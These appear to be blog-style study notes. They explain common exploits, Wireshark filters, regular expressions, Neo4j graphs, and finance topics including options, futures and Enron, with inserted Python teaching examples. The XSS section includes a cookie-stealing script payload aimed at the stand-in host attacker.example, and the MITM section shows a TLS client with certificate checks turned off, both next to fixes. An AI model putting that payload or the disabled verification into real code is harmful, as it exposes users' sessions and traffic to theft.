Common Exploits and How They Work

Man in the Middle: "an attack where the attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other." -Wikipedia

A MITM (sometimes MitM or MTM) attack does not happen at the source or destination but somewhere on the route between them: a rogue Wi-Fi access point, a poisoned ARP or DNS answer, or a compromised router. The defences are therefore about authenticating the far end and protecting data in transit, not only about the network itself. Use TLS with certificate validation turned on (an interceptor can only "impersonate SSL" if the client accepts its certificate), enable only current protocol versions (TLS 1.2 or 1.3), turn on HSTS so browsers refuse to downgrade to plain HTTP, and configure firewalls, switches and routers so that no unauthorized party can join the network or reconfigure a potential interception point.
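The client-side half of that advice, as an added example (not code from the original notes): the weak TLS client configuration that lets an interceptor's certificate through, next to the hardened one. The `cafile` parameter is an assumption for illustration; pass a pinned CA bundle for internal services or leave it as None to use the system trust store.

```python
import ssl


def insecure_client_context():
    # What "just disable the certificate error" actually does: any certificate,
    # including one minted on the fly by a box on the path, is accepted, and the
    # name in the certificate is never compared with the host we meant to reach.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context(cafile=None):
    # Verify the chain against trusted roots (system store, or a pinned bundle
    # via cafile, assumed here), check the hostname, and refuse TLS 1.0/1.1 so a
    # downgrade by the interceptor is rejected rather than negotiated.
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_report(ctx):
    """Summarize the properties that decide whether an interceptor can succeed."""
    return {
        "verifies_chain": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": bool(ctx.check_hostname),
        "min_version": ctx.minimum_version.name,
    }


if __name__ == "__main__":
    print("insecure:", context_report(insecure_client_context()))
    print("hardened:", context_report(hardened_client_context()))
```

Pass the hardened context to `ctx.wrap_socket(sock, server_hostname=host)` (or to any HTTP client that accepts an SSLContext); with `server_hostname` set, a certificate for the wrong name fails the handshake instead of being silently accepted.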


SQL Injection: "An SQL injection is a computer attack in which malicious code is embedded in a poorly-designed application and then passed to the backend database. The malicious data then produces database query results or actions that should never have been executed." -Techopedia.com




Cross-site Scripting (XSS): "XSS enables attackers to inject client-side scripts into web pages viewed by other users." -Wikipedia




For a basic example, suppose a site takes a comment from UserX and inserts it into a page without encoding it. UserX posts a comment containing a <script> element; when UserA views that page, UserA's browser cannot tell the injected script from the site's own and runs it with UserA's logged-in session. The script can then read UserA's session cookie (unless it is marked HttpOnly) and send it to UserX, or silently issue requests in UserA's name, so UserX ends up impersonating UserA without ever intercepting any traffic.
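The same scenario in code, as an added example that is not part of the original notes: a comment page rendered once with raw interpolation and once with HTML encoding, plus the cookie flags that limit the damage if a script does run. The payload, template and attacker host (attacker.example) are constructed for the demonstration.

```python
import html

# Constructed attacker-supplied comment: exfiltrates the viewer's cookies by
# loading an image from a host the attacker controls.
PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
           '+document.cookie</script>')

TEMPLATE = ('<html><body><h1>Comments</h1>'
            '<div class="comment">{comment}</div></body></html>')


def render_vulnerable(comment):
    # Untrusted text is interpolated straight into the HTML, so the browser
    # parses the attacker's <script> element and executes it for every viewer.
    return TEMPLATE.format(comment=comment)


def render_safe(comment):
    # Encode the characters that can change HTML structure (& < > " ') at the
    # point of output. The browser then shows the payload as text.
    return TEMPLATE.format(comment=html.escape(comment, quote=True))


def contains_script_element(page):
    """True if the page contains a script element the browser would execute."""
    return "<script" in page.lower()


def session_cookie_header(session_id):
    # Defense in depth: HttpOnly keeps document.cookie from exposing the session
    # token even if a script does run; Secure and SameSite limit where it is sent.
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding must match the context (HTML body here; attributes, URLs and JavaScript each need their own rules), which is why template engines that auto-escape by default are preferred over hand-built strings. A Content-Security-Policy that disallows inline scripts is the second layer.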



Buffer Overflow Attack:


A buffer overflow occurs when a program writes more data into a fixed-size buffer (on the stack or the heap) than it can hold, so the excess spills into adjacent memory. On the stack that adjacent memory includes the saved return address; on the heap it includes allocator metadata and neighbouring objects, function pointers among them. By choosing the bytes that overflow, an attacker redirects control flow to code of their choosing instead of the program's own instructions.

The real mitigations live in the code and the platform: bounds checking and memory-safe languages, compiler stack canaries, non-executable stacks (DEP/NX) and address space layout randomization (ASLR). An intrusion detection system can alert administrators when a known exploit payload crosses the network, but it does not stop the overflow itself. Some well-known buffer overflow attacks: https://www.cypressdatadefense.com/education-training/buffer-overflow-attacks-need-know/


Rootkit Deployment: "A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence." -Veracode.com

What sets rootkits apart is that they are designed to stay hidden. On Windows, for instance, a rootkit hooks the Win32 API functions or kernel structures that enumerate processes, files and registry keys, and filters its own artifacts out of the results; a process list produced through a hooked API simply does not show the malicious program, so it keeps running in the background past most normal system checks. Sysinternals' RootkitRevealer compares what the high-level API reports with what the raw disk and registry actually contain and flags the discrepancies. Because a kernel-mode rootkit controls the same OS the scanner runs on, the reliable check is offline: boot from trusted media or compare against a known-good image. Secure Boot and driver signature enforcement raise the cost of installing one in the first place.




The following are some of the more well-known Exploits:

Stuxnet: Uncovered in 2010, this worm spread between Windows machines over removable USB drives (abusing a flaw in how Windows parsed shortcut .LNK files, not the Autorun feature) and across local networks, and its payload targeted the Siemens industrial control software at Iran's Natanz uranium enrichment plant. It hid itself with a kernel-mode rootkit whose drivers were signed with certificates stolen from two hardware vendors. It manipulated the PLCs driving the centrifuges while replaying normal-looking readings to the operators, who therefore had no warning that the equipment was being driven to destruction. Stuxnet is widely reported to have been a joint US and Israeli operation, and to have set Iran's enrichment program back by as much as a few years, according to the New York Times: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html


WannaCry: "The WannaCry ransomware attack was a May 2017 worldwide cyberattack by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency." - Wikipedia 

WannaCry spread on its own using EternalBlue, an exploit for a flaw in Windows SMBv1 that Microsoft had patched two months earlier (MS17-010), so unpatched machines were infected with no user action at all. Among the hardest hit was Britain's National Health Service (NHS), where hospitals cancelled appointments and diverted patients. The attack collected a modest number of ransom payments relative to the damage it caused, and a researcher's registration of a hard-coded "kill switch" domain halted its spread.


Sony Pictures: In November 2014 the internal network of Sony Pictures Entertainment was compromised by a group calling itself "Guardians of Peace". The intrusion reportedly began with phishing emails that harvested administrator credentials. Embarrassing internal email correspondence, employee personal data and unreleased film material were leaked to the public, and wiper malware destroyed data on thousands of machines. In 2018 the US Department of Justice charged North Korean programmer Park Jin Hyok in connection with the Sony intrusion as well as the WannaCry attack: https://www.pbs.org/newshour/nation/north-korean-programmer-charged-in-sony-hack-wannacry-attack


Spectre: Disclosed in January 2018, Spectre is a hardware vulnerability rather than a piece of malware, and it does not alter how processors work; it abuses what they already do. To run fast, CPUs speculatively execute instructions down a predicted branch before knowing whether the branch is really taken. An attacker who trains the branch predictor can make victim code speculatively touch secret data; the speculative results are discarded, but their effect on the cache is not, and it can be read back through a timing side channel. The result is a leak of memory across process and privilege boundaries. It is not a remote code execution bug, but it has been demonstrated from JavaScript in a browser, so an untrusted web page is a realistic delivery route. Mitigation takes a combination of microcode, OS and compiler updates (and browser changes that reduce timer precision), and a successful attack leaves nothing in ordinary logs, so diligent patching is the only practical defence.



Cybersecurity Organizations and Resources:

OWASP Free and Open Security Community

Offensive Security

Microsoft Security

Android Security

Linux Security

Useful Wireshark Filters, Tips

Wireshark is a network traffic (packet) analyzer that is used for troubleshooting network issues and debugging applications at the network layer. With Wireshark you can usually isolate the device or communication link responsible for abnormal behavior in a network-based application.

Wireshark's UI can tell you a plethora of information about packets and their relationships; the key is to isolate the information you need to solve your specific problem.

The following are some of Wireshark's more useful tools for developers looking to get close inspection on network communications and data/packet movement:

Search for strings in packets: frame contains "local"

Display Filter reference: https://wiki.wireshark.org/DisplayFilters

Display Filter with Regex: frame matches "[B@]\w+" && frame.len < 55

Analyze existing pcaps: https://www.netresec.com/?page=PcapFiles

Follow Streams: Right-click packet and select "Follow" to isolate conversations.

Filter for only your IP: ip.addr == 192.168.1.10 (substitute your own address) shows only traffic to or from that host; use ip.src or ip.dst to keep one direction. On a switched network you normally see only your own unicast traffic plus broadcasts anyway; to capture other hosts' traffic you need a SPAN/mirror port or a tap.

Bad TCP setup: https://www.davidsudjiman.info/2018/02/08/capturing-bad-tcp-packets/
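To make the filters above concrete, here is an added example (not from the original notes or from Wireshark) that builds a three-packet capture in the classic pcap format and applies simplified versions of frame contains, frame matches, frame.len and ip.addr to it. The frames, addresses (RFC 1918 and RFC 5737 documentation ranges) and payloads are constructed; checksums are left at zero.

```python
import re
import struct

LINKTYPE_ETHERNET = 1


def make_frame(src, dst, payload):
    """Constructed Ethernet/IPv4/TCP frame carrying `payload` (checksums zero)."""
    eth = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return eth + ip + tcp


def build_pcap(frames):
    """Serialize raw frames into a little-endian pcap file (what Wireshark reads)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def parse_pcap(data):
    """Yield one dict per packet with the fields the filters below inspect."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != 0xA1B2C3D4:
        raise ValueError("not a little-endian pcap (pcapng needs another parser)")
    off, number = 24, 0
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        frame = data[off:off + incl_len]
        off += incl_len
        number += 1
        pkt = {"number": number, "time": ts_sec + ts_usec / 1e6,
               "len": len(frame), "bytes": frame}
        # IPv4 over Ethernet with a 20-byte header: addresses sit at fixed offsets.
        if len(frame) >= 34 and frame[12:14] == b"\x08\x00" and frame[14] >> 4 == 4:
            pkt["ip.src"] = ".".join(str(b) for b in frame[26:30])
            pkt["ip.dst"] = ".".join(str(b) for b in frame[30:34])
        yield pkt


# Simplified stand-ins for the display filters; each returns a predicate.
def frame_contains(text):
    return lambda p: text.encode() in p["bytes"]


def frame_matches(regex):
    # "matches" is a regex search over the raw bytes. Note that "[" opens a
    # character class, so a literal "[B@" has to be written "\[B@".
    pat = re.compile(regex.encode())
    return lambda p: pat.search(p["bytes"]) is not None


def frame_len_lt(n):
    return lambda p: p["len"] < n


def ip_addr(address):
    return lambda p: address in (p.get("ip.src"), p.get("ip.dst"))


def apply_filter(pcap_bytes, *predicates):
    """Packet numbers satisfying every predicate, like a && chain in the filter bar."""
    return [p["number"] for p in parse_pcap(pcap_bytes)
            if all(pred(p) for pred in predicates)]


# Constructed capture: an HTTP request, its reply, and a third host sending a
# Java-style "[B@..." byte-array string.
SAMPLE_PCAP = build_pcap([
    make_frame("192.168.1.10", "203.0.113.5", b"GET /local/index.html HTTP/1.1\r\n"),
    make_frame("203.0.113.5", "192.168.1.10", b"HTTP/1.1 200 OK\r\n"),
    make_frame("192.168.1.22", "192.168.1.10", b"[B@1f3a9c2d"),
])

if __name__ == "__main__":
    print(apply_filter(SAMPLE_PCAP, frame_contains("local")))                       # [1]
    print(apply_filter(SAMPLE_PCAP, frame_matches(r"\[B@\w+"), frame_len_lt(70)))  # [3]
    print(apply_filter(SAMPLE_PCAP, ip_addr("192.168.1.10")))                      # [1, 2, 3]
```

Write SAMPLE_PCAP to a file and open it in Wireshark to compare: the same three expressions in the filter bar select the same packets.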

Regular Expressions

Regular expressions (regex) are strings of pattern syntax and literal characters used to find patterns of characters within some contiguous string (for example form validation, an IDE identifying opening and closing tags in markup, or a terminating semicolon in Java/C#). A more formal definition describes regex as:
"In computing, regular expressions provide a concise and flexible means for identifying strings of text of interest, such as particular characters, words, or patterns of characters. Regular expressions (abbreviated as regex or regexp, with plural forms regexes, regexps, or regexen) are written in a formal language that can be interpreted by a regular expression processor, a program that either serves as a parser generator or examines text and identifies parts that match the provided specification."

 This diagram breaks down the gist of how an expression works- see the reference below for full list of matching modifiers and syntax

Having more than a passing familiarity with regex can be a tremendous help when doing any kind of development related to the identification of patterns in character/symbol data. When you understand how each component works you can very easily begin to build your own expressions to suit your particular application's pattern matching needs.

Below are some common regular expressions:

Alphanumeric Strings and Chars
^\w+$

Username (3 to 16 characters, lowercase letters, digits, underscore and hyphen)
/^[a-z0-9_-]{3,16}$/

Hexadecimal ID
/^#?([a-f0-9]{6}|[a-f0-9]{3})$/

Email (lowercase only as written; add the i flag or lowercase the input first)
/^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/

URL
/^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$/

ipV4 Address
/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/

HTML Tag (a single, simple element only; nested or malformed markup needs a parser, as for XML below)
/^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/

XML Tags
Don't use Regex, use something like XPath
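A worked check of the patterns listed above, added here and not part of the original notes. Two things it shows that the list does not: the patterns are run with fullmatch rather than an anchored match (in Python "$" also matches before a trailing newline, so "alice_01\n" slips past ^...$), and the URL pattern as listed has a nested quantifier, ([\/\w \.-]*)*, that makes the regex engine do exponential work on near-miss input (a regular-expression denial of service, ReDoS). The rewritten URL pattern accepts the same strings with one star. The has_nested_quantifier helper is a rough static check of my own, not a tool from the referenced tutorial.

```python
import re

# Patterns from the list, compiled for fullmatch() so the anchors cannot be
# bypassed by a trailing newline.
USERNAME = re.compile(r"[a-z0-9_-]{3,16}")
HEX_COLOR = re.compile(r"#?([a-f0-9]{6}|[a-f0-9]{3})")
EMAIL = re.compile(r"([a-z0-9_.-]+)@([\da-z.-]+)\.([a-z.]{2,6})", re.IGNORECASE)
IPV4 = re.compile(r"(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
                  r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)")

# The URL pattern exactly as listed, kept as a string and deliberately never
# compiled: the path part ([\/\w \.-]*)* nests a quantifier inside a quantified
# group, so on "http://x.com/" + "a" * 30 + "!" the engine tries every split of
# the path between the inner and outer star before giving up.
URL_UNSAFE = r"(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?"
# Same accepted language, one star: linear time on hostile input.
URL = re.compile(r"(https?://)?([\da-z.-]+)\.([a-z.]{2,6})([/\w .-]*)/?")

VALIDATORS = {"username": USERNAME, "hex": HEX_COLOR, "email": EMAIL,
              "ipv4": IPV4, "url": URL}


def validate(kind, value):
    """True when the whole of `value` matches the pattern for `kind`."""
    return VALIDATORS[kind].fullmatch(value) is not None


def has_nested_quantifier(pattern):
    """Crude static check for the ReDoS shape: a group whose body ends in * or +
    that is itself followed by * or +. Not a proof either way; it catches the
    common case seen in copied-and-pasted validators."""
    return re.search(r"\([^()]*[*+]\)[*+]", pattern) is not None


if __name__ == "__main__":
    for kind, value in [("username", "alice_01"), ("username", "Alice"),
                        ("username", "alice_01\n"), ("hex", "#1a2b3c"),
                        ("email", "Bob.Smith@Example.COM"),
                        ("ipv4", "192.168.1.10"), ("ipv4", "256.1.1.1"),
                        ("url", "https://example.com/path/to file.txt"),
                        ("url", "ftp://example.com")]:
        print(f"{kind:9} {value!r:40} {validate(kind, value)}")
    print("listed URL regex has nested quantifier:", has_nested_quantifier(URL_UNSAFE))  # True
    print("rewritten URL regex has nested quantifier:", has_nested_quantifier(URL.pattern))  # False
```

The practical rule: never run an unvetted regex from a snippet site on attacker-controlled input, anchor with fullmatch (or \A and \z), and prefer a real parser (ipaddress, email-address libraries, urllib) when the format has one.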


Just remember that square brackets enclose a character class (the set of characters allowed at that position), curly braces are quantifiers that say how many repetitions to match, parentheses surround regex "capture groups", and the remaining syntax (?, *, +, ^, $ and the flags) controls how much to match and other special conditions applied to the expression. Go here to practice and learn more: https://regexr.com/


The diagram above illustrates a regex with two capture groups, one for alphabetic characters and the other for digits.


Reference: https://code.tutsplus.com/tutorials/8-regular-expressions-you-should-know--net-6149

Neo4j Graphs: Creating and Querying Edges and Nodes

First it is helpful to understand the basic premise behind Graph Theory, which is the foundation of these "Pairwise relations between objects" that we can store and explore in graph databases. The mathematical representation is the formula:

G = (V, E): a graph G is defined by its set of entity nodes, also called "vertices" (V), together with the set of relationship edges (E) that connect pairs of them.


Swiss mathematician Leonhard Euler was looking for a solution to a puzzle about the seven bridges of Königsberg (then in Prussia) and the land masses they connected. His 1736 paper on it was the genesis of graph theory:

"The geometry of position, now known as Graph theory"

Graph database technology is useful for analyzing complex relationships and relationship behaviors in myriad scenarios not limited to:
  • Computer Networking
  • Spread of Gossip
  • Fraud Detection
  • Forensic Investigations
  • Flight Mapping/GPS
  • Population Growth
  • Spread of Infectious Disease
  • Hierarchy Visualization

It is also a vital component for the analysis of (increasingly) unstructured data. By unstructured we typically mean data that is not easily modeled in a traditional relational schema but may still have common properties and so still have relationship value. It is estimated that around 80-90% of an organization's data is unstructured.

Example of a couple simple graph relationships

In a property graph such as Neo4j's, the data lives in nodes (the entities) and relationships (the edges), and both can carry properties as key/value pairs. Instead of the primary-key/foreign-key and check constraints of an RDBMS, the relationship itself is stored as a first-class record with a type and a direction, so moving from one entity to a connected one is a pointer hop rather than a join, and the properties you query with Cypher live on the node or relationship instead of in a column per property. (SQL Server's graph feature uses the terms "node tables" and "edge tables" for the same two ideas.)

Nodes (node tables): represent a data entity, with a label and properties

Relationships (edge tables): store the typed, directed connection between two nodes, with properties of their own

For the RDBMS purists and skeptics out there, I recommend this quote about Node, Graph and other alternative data processing paradigms vs. the traditional RDBMS OLTP and OLAP models:
"The NOSQL acronym is: Not Only S Q L. NOSQL solutions are not a replacement or successor for RDMBS systems, nor were they ever intended to be. They are useful tools to be used for specific purposes. They are to be used as part of an organisation’s data management solution and not as a total replacement for the existing solution". -Simon Munro
It is important to note that graph data can be queried in much the same way as SQL through a graph-specific query language; for Neo4j that language is Cypher, as you will see in the following demonstration.

For a quick demonstration on how easy it is to get up and running with this technology we will be using Neo4j which you can download here: https://neo4j.com/download/


Walkthrough of Neo4j:
Fire up the Neo4j Desktop client, click "New" and then click the "Add Graph" button to create your first graph database. Once the db has been created, click the play icon to start it up (it must be running for Neo4j browser to connect).

This is the Neo4j main home screen from which you can create and connect to graph databases and projects

Then click the "Neo4j Browser" button to launch the graph data browser for creation and visual exploration of graph data relationships.

Next, in the Neo4j browser, click "Jump into Code" and simply follow the prompts to begin creation and querying of graph data.

Once, in the Neo4j tutorial, you can simply follow the prompted instruction widgets.

I would continue with instructions but the rest is refreshingly self-explanatory. You first create a movie database in which actors, directors and movies are Person and Movie nodes, and the ways they are connected (ACTED_IN, DIRECTED and so on) are typed relationships between those nodes.

One thing to note is that to execute a Cypher command in the browser, you press Ctrl+Enter. Alternatively you can click the play button to execute it.

As you continue with the tutorial you will wind up with something like this when you get to the step that has you execute CQL to find all Node entities that are within 4 degrees (or node "hops") of the actor Kevin Bacon:

4 degrees of separation from Kevin Bacon...
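What that "4 degrees" query actually computes is a breadth-first traversal bounded by hop count, and it is worth seeing in plain code, so here is an added example that is neither the tutorial's data nor Neo4j's implementation. It builds a constructed toy subset of the movie graph as G = (V, E), with Person and Movie nodes joined by ACTED_IN edges, and answers two questions: which nodes lie within 4 hops of Kevin Bacon, and what an actor's Bacon number is. The same traversal over a graph of hosts and credentials is how attack-path tools rank how far a compromised account is from domain admin.

```python
from collections import deque

# Constructed toy graph: (person, movie) ACTED_IN edges, a small illustrative
# subset in the shape of the Neo4j movie tutorial.
EDGES = [
    ("Kevin Bacon", "Apollo 13"), ("Tom Hanks", "Apollo 13"),
    ("Tom Hanks", "Cast Away"), ("Helen Hunt", "Cast Away"),
    ("Helen Hunt", "Twister"), ("Bill Paxton", "Twister"),
    ("Bill Paxton", "Titanic"), ("Kate Winslet", "Titanic"),
    ("Kate Winslet", "The Reader"), ("Ralph Fiennes", "The Reader"),
]


def build_adjacency(edges):
    """Adjacency sets: the keys are V, the pairs are E. Each edge is stored in
    both directions because "within N hops" ignores relationship direction,
    as the unadorned -[*1..4]- pattern in Cypher does."""
    adj = {}
    for person, movie in edges:
        adj.setdefault(person, set()).add(movie)
        adj.setdefault(movie, set()).add(person)
    return adj


def within_hops(adj, start, max_hops):
    """Breadth-first search: every node reachable in at most max_hops edges,
    mapped to its distance from start. The first time a node is seen is along
    a shortest path, which is what makes the hop bound exact."""
    dist = {start: 0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if dist[node] == max_hops:
            continue
        for neighbour in adj.get(node, ()):
            if neighbour not in dist:
                dist[neighbour] = dist[node] + 1
                queue.append(neighbour)
    return dist


def bacon_number(adj, actor, centre="Kevin Bacon"):
    """Actor-to-actor distance. Every movie in the chain is its own node, so the
    Bacon number is half the node-hop distance; None if unreachable."""
    hops = within_hops(adj, centre, len(adj)).get(actor)
    return None if hops is None else hops // 2


if __name__ == "__main__":
    graph = build_adjacency(EDGES)
    print(sorted(within_hops(graph, "Kevin Bacon", 4)))
    # ['Apollo 13', 'Cast Away', 'Helen Hunt', 'Kevin Bacon', 'Tom Hanks']
    print(bacon_number(graph, "Ralph Fiennes"))  # 5
```

The database does the same walk but stores each relationship as a direct pointer from the node, so the cost grows with the number of hops and neighbours visited, not with the size of the whole table as a chain of relational self-joins would.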

Once you get comfortable with CQL syntax it is relatively easy to start modeling and creating your own graph database structures which can help you and/or your company to analyze some of the unstructured and semi-structured data that is hard to extract value from with traditional RDBMS.

Bigtime kudos to the Neo4j team on making this so straightforward and simple to learn and get up and running with a new technology so fast. I've never seen a technology tutorial like it.

As you can see, there is tremendous potential value in exploring data relationships that don't necessarily fit neatly into traditional RDBMS/hierarchical databases but are no less useful a tool to have in an organization's data analysis arsenal.


References:

https://www.mssqltips.com/sqlservertip/5007/sql-server-2017-graph-database-query-examples/

https://www.youtube.com/watch?v=gXgEDyodOJU

https://www.red-gate.com/simple-talk/sql/t-sql-programming/experiments-with-neo4j-using-a-graph-database-as-a-sql-server-metadata-hub/

https://www.youtube.com/watch?v=mVWn8k49mAQ

Securitization

Securitization is the creation and sale of pieces of debt from a pool of similar debt assets. It is a way for banks to take a group of home mortgage loans for instance, and cut the asset group into pieces or "tranches" that can be sold as MBSs (mortgage backed securities) on the open market.


Lots of touch points in this interesting "value abstraction" process

While many investment banks who used this financial implement in the run-up to the Great Recession have been strongly criticized for not vetting assets thoroughly enough in the origination process, the process of securitization will always be a method for asset holders to convert an illiquid asset like a group of home mortgages or consumer credit card debt into something (or rather "some things") that can be more easily packaged, bought and sold on the open market.


Reference: https://blog.bankex.org/paving-the-way-from-securitization-to-tokenization-ac0187ba6d48


Options, Calls and Puts

In finance, an option is a contract which gives the buyer the right, but not the obligation, to buy or sell an underlying asset at a specified price prior to or on a specified date, known as the "expiry date". An option contract typically requires an upfront payment for the option, called the premium.

A call option, also referred to as a "call" in finance jargon, gives the buyer the right to buy the underlying asset at an agreed-upon price on a specific date or within a specified period of time.

A put option, also referred to as a "put", gives the buyer the right to sell the underlying asset at an agreed-upon price on a specific date or within a specified period of time.

Calls give the right to buy, puts give the right to sell

The important characteristic of options contracts is that they give the right- not the obligation- to buy or sell an asset at some agreed upon price on or before the option's contract expiration date. The option holder can simply walk away from the option to buy or sell if she or he decides it is no longer in their best interest.

Options are another asset class, and when used correctly, they offer many advantages that trading stocks and ETFs alone cannot (namely the ability to decide not to exercise the option if the value of the underlying asset being bought or sold changes significantly (in the wrong direction) for the option holder before the expiry date, for instance).

Options are different from futures contracts in that option contracts give the right to buy or sell on or before some date, while futures contracts represent an obligation to buy or sell on some date.

With options, financial traders can lock in future gains if an asset value is expected to (and does) rise in value above their call price, and conversely can stem future losses if an asset value is expected to (and does) drop in value below their put price.


References:

https://investinganswers.com/financial-dictionary/optionsderivatives/option-2049

https://www.fool.com/investing/options/options-the-basics.aspx


The Infamous Story of ENRON

The story of Enron is a story of greed and how a Houston-based energy company rocketed to the top echelon of Corporate America before losing everything.

From stodgy Oil & Gas merger, to high-flying corporate giant, to an astonishing demise

Formed from the 1985 merger of Houston Natural Gas and InterNorth, Enron began with humble roots. Kenneth Lay was an enterprising economics graduate from Missouri who learned the ropes of the oil and gas business early, completing a PhD in economics in 1970 and rising to chief executive of Houston Natural Gas before its merger with InterNorth.

For years the company had solid (if not spectacular) results and even overcame a couple near-fatal financial disasters that resulted from oil futures and origination guarantees deals gone bad. An almost overly-proud Harvard MBA from Illinois, Jeff Skilling joined Enron's ranks after several years of consulting for the energy giant as part of Enron's cozy relationship with McKinsey and Company.

Enron's fatal flaw was the belief that accounting "creativity" can permanently hide fraud 

In time, Skilling became COO and began to call for the mass hiring of elite MBA types and math gurus which he transformed into his "complex deal making" army. He became particularly close with Enron's oddball finance and accounting veteran Andrew Fastow who paired the brains of Jeff's army with the creativity of accounting fraud to make Enron appear, at least to investors and banks, as an extravagant capital-generating machine.

Fastow and his crack team of corporate fraudsters developed a network of shell companies known as SPEs or "special purpose entities" and used these as vehicles for hiding losses and booking fictitious deals- to the tune of several billion dollars of imaginary capital and unreported losses. Quarter after quarter, when Enron divisions were struggling to "hit the numbers" that Wall Street analysts expected- Andy would step in to save the day with his SPE magic that- at least temporarily- made bad news go away.

Another favorite method of Fastow and Skilling was "mark to market" accounting treatment of their energy deals, meaning that they reported, as current income, the estimated future income over the whole life of a deal, for virtually every deal they did. This is great when things are going well but it is an obviously untenable situation. While Enron was flashing the gaudy mark to market income figures to the Street, the future still required them to actually service those deals, and they could never book another accounting profit on them because the entire deal's income had already been reported.

Enron's pursuit of Wall Street's favor made a mockery of their Code of Ethics

Enron, which had once been a company with deep roots in Oil & Gas and was hands-on in developing pipelines and sourcing fossil fuels for delivery contracts, was now in the business of trading on energy futures that bore little to no resemblance to true tangible "present values". Everything was speculation. Everything was reduced to hedges and bets. Nothing was real anymore. And it all collapsed under the weight of its own obfuscation.

Sure there were other reasons Enron collapsed. There was the comical Enron Broadband Services which tried to take on the early internet giants like AOL, and went..... nowhere. There were notorious global deals in places like India and England that became financial albatrosses which only Fastow's shell games could attempt to mask- for a time. But it was really just simple greed and criminal accounting.

Jeff Skilling Harvard MBA abstract mastermind, avoider of details and implementation

Even the once-proud accounting firm Arthur Andersen would be brought down by the fall of Enron: convicted in 2002 of obstructing justice for shredding Enron audit documents (a verdict the Supreme Court later overturned), it surrendered its licenses and effectively ceased to exist as an auditor. Andersen had raised some objections early on about the use of SPEs and the aggressive manner of recognizing profits and losses, but ultimately it went along with and signed off on the grossly improper financial reporting.

The Justice Department, the SEC and FBI had long been looking at the company by the time Enron's offices were raided on January 22nd, 2002. What followed was the trial and conviction of several Enron executives including Fastow, Skilling and Lay who were sentenced for an assortment of fraud and conspiracy charges related to the heart of the scandal.

Andy Fastow was given a reduced 6 year sentence after agreeing to cooperate and testify against his former bosses. He was released from prison in 2011 and is now a popular speaker at business ethics and accounting fraud conferences.

Skilling received 24 years in federal prison for his role, later reduced to 14 years in a 2013 agreement. He was released to a Texas halfway house on August 30th of 2018.

Ken Lay died of a heart attack while awaiting sentencing.

The biggest losers of Enron's demise were Enron employees and common stockholders who bet big on Enron's future

The timeline, web of deceit and cast of characters in this tragedy is truly fascinating. Rebecca Mark, Ken Rice, Lou Pai, and so many more interesting personalities are woven into this spectacular story that is told best by the people who (literally) wrote the book. For a comprehensive look into this business debacle, the award-winning book and documentary can be found here:

The Smartest Guys in the Room book by Bethany McLean and Peter Elkind

ENRON: The Smartest Guys in the Room

In the end, this was a tragedy of obscene hubris and ultimate humility. The ironic thing is that they had a solid business model and were it not for the lies that enabled inflated financial reporting, Enron- albeit a smaller and less glamorous Enron- would likely still be in business today.

Capital Gains (Losses) and Capital Gains Tax

Capital gains are often thought of in the context of profiting from the sale of some stock or other security-based financial product. Capital losses on the other hand, are the opposite (the loss incurred from the sale of stock). It is important to remember however, that capital gains and capital losses can also include other sales such as the sale of a vehicle, the sale of a home, the sale of an antique, etc.



Capital gains tax is paid by sellers (both businesses and consumers) who have profited from the sale of some asset (bonds, stocks in other businesses, company equipment that was sold for profit). 

A capital loss occurs when an asset is sold for less than it was purchased for. Losses offset capital gains, and a net loss is deductible against other income up to an annual limit, with any remainder carried forward to later years.



Commodities and Securities Futures

"A futures contract is an agreement to buy or sell an asset at a future date at an agreed-upon price"

Futures markets such as the New York Board of Trade and the Chicago Mercantile Exchange facilitate the trading of futures contracts. Futures trading is often thought of only as raw materials (commodities), however financial products or "securities" are also traded in futures markets:

Commodities: A commodity is a raw material that has value and is more or less in constant demand (think- milk, eggs, pork, beef, chicken, lumber, iron, salt, crude oil, coal, etc.).

Securities (Financial): a financial future is a contract on a financial instrument or index rather than a physical good: an interest rate, a stock index, a currency, or a debt instrument such as a CDO.

A recent history of returns on commodities futures by year and type


Futures trading is simply buyers betting on the future value of some product from the sellers. In commodities this could be a day trader speculating that the price of oil is about to skyrocket and buying contracts for purchases of oil at a lower price (he/she hopes).

